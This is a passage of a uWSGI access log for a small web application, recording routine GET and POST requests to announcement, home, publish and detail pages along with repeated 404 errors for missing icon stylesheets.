bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1124/1483] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1125/1484] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1126/1485] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1127/1486] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1128/1487] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:48:14 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1129/1488] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:48:14 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1130/1489] 219.228.146.132 () {42 vars in 897 bytes} [Wed Jan 13 05:51:55 2021] GET /home/ => generated 8861 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1490] 219.228.146.132 () {42 vars in 838 bytes} [Wed Jan 13 05:51:56 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1132/1491] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:54:42 2021] GET /announcement/? => generated 9971 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1132/1492] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 05:54:42 2021] POST /announcement/ => generated 27 bytes in 9 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 1) +[pid: 12823|app: 0|req: 1133/1493] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:54:42 2021] GET /announcement/ => generated 10842 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1134/1494] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1135/1495] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1136/1496] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1137/1497] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1138/1498] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1139/1499] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1140/1500] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1141/1501] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:54:42 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1142/1502] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:54:42 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1143/1503] 219.228.146.93 () {38 vars in 746 bytes} [Wed Jan 13 05:54:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1504] 219.228.146.93 () {38 vars in 764 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1505] 219.228.146.93 () {38 vars in 753 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1506] 219.228.146.93 () {38 vars in 739 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1507] 219.228.146.93 () {38 vars in 778 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1508] 219.228.146.93 () {38 vars in 756 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1509] 219.228.146.93 () {38 vars in 755 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1510] 219.228.146.93 () {38 vars in 758 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1511] 219.228.146.93 () {38 vars in 760 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1512] 219.228.146.93 () {38 vars in 737 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1513] 219.228.146.93 () {38 vars in 745 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1514] 219.228.146.93 () {38 vars in 785 bytes} [Wed Jan 13 05:54:52 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1515] 219.228.146.93 () {38 vars in 791 bytes} [Wed Jan 13 05:54:52 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1145/1516] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:55:31 2021] GET /announcement/? => generated 10842 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1145/1517] 219.228.146.132 () {48 vars in 979 bytes} [Wed Jan 13 05:55:31 2021] POST /announcement/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (10 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1146/1518] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1147/1519] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1148/1520] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1149/1521] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1150/1522] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1151/1523] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1152/1524] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1153/1525] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:55:31 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1154/1526] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:55:31 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1156/1527] 219.228.146.132 () {48 vars in 979 bytes} [Wed Jan 13 05:59:30 2021] POST /announcement/? => generated 27 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 179 bytes (3 switches on core 0) +[pid: 12823|app: 0|req: 1156/1528] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:59:30 2021] GET /announcement/? => generated 11713 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1157/1529] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:59:30 2021] GET /announcement/ => generated 12563 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1158/1530] 219.228.146.132 () {38 vars in 833 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1159/1531] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1160/1532] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1161/1533] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1162/1534] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1163/1535] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1164/1536] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1165/1537] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:59:30 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1166/1538] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:59:30 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1168/1539] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 06:05:04 2021] GET /announcement/? => generated 12563 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1168/1540] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 06:05:04 2021] POST /announcement/ => generated 27 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 1) +[pid: 12823|app: 0|req: 1169/1541] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 06:05:04 2021] GET /announcement/ => generated 13398 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1170/1542] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1171/1543] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1172/1544] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1173/1545] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1174/1546] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1175/1547] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1176/1548] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:05:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1177/1549] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:05:04 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1178/1550] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:05:04 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1179/1551] 219.228.146.132 () {42 vars in 897 bytes} [Wed Jan 13 06:05:09 2021] GET /home/ => generated 9280 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1552] 219.228.146.132 () {42 vars in 838 bytes} [Wed Jan 13 06:05:09 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1180/1553] 219.228.146.132 () {40 vars in 877 bytes} [Wed Jan 13 06:05:17 2021] GET /publish/ => generated 5083 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1181/1554] 219.228.146.132 () {40 vars in 891 bytes} [Wed Jan 13 06:05:24 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1182/1555] 219.228.146.132 () {40 vars in 893 bytes} [Wed Jan 13 06:05:24 2021] GET /kind-manage/ => generated 12023 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1183/1556] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1184/1557] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1185/1558] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1186/1559] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1187/1560] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1188/1561] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1189/1562] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:05:24 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1190/1563] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:05:24 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1191/1564] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:05:24 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1192/1565] 219.228.146.93 () {50 vars in 971 bytes} [Wed Jan 13 06:07:41 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0) +[pid: 12823|app: 0|req: 1193/1566] 219.228.146.93 () {40 vars in 796 bytes} [Wed Jan 13 06:07:41 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1194/1567] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:07:41 2021] GET /home/ => generated 9278 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1195/1568] 219.228.146.93 () {38 vars in 746 bytes} [Wed Jan 13 06:07:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1196/1569] 219.228.146.93 () {50 vars in 971 bytes} [Wed Jan 13 06:07:53 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1197/1570] 219.228.146.93 () {40 vars in 796 bytes} [Wed Jan 13 06:07:53 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1198/1571] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:07:53 2021] GET /home/ => generated 9278 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1199/1572] 219.228.146.93 () {40 vars in 814 bytes} [Wed Jan 13 06:12:16 2021] GET /single-an-6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1200/1573] 219.228.146.93 () {40 vars in 816 bytes} [Wed Jan 13 06:12:16 2021] GET /single-an-6/ => generated 3082 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1201/1574] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:12:19 2021] GET /home/ => generated 9278 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1202/1575] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 06:12:20 2021] GET /single-an-2 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1203/1576] 219.228.146.93 () {40 vars in 817 bytes} [Wed Jan 13 06:12:20 2021] GET /single-an-2/ => generated 3085 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1204/1577] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:12:22 2021] GET /home/ => generated 9278 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1205/1578] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 06:12:24 2021] GET /single-an-3 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1206/1579] 219.228.146.93 () {40 vars in 817 bytes} [Wed Jan 13 06:12:24 2021] GET /single-an-3/ => generated 3100 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1207/1580] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:12:26 2021] GET /home/ => generated 9278 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1208/1581] 219.228.146.93 () {40 vars in 811 bytes} [Wed Jan 13 06:12:29 2021] GET /all-0-0-0 => generated 9500 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1582] 219.228.146.93 () {38 vars in 760 bytes} [Wed Jan 13 06:12:29 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1583] 219.228.146.93 () {38 vars in 762 bytes} [Wed Jan 13 06:12:29 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1584] 219.228.146.93 () {38 vars in 832 bytes} [Wed Jan 13 06:12:29 2021] GET 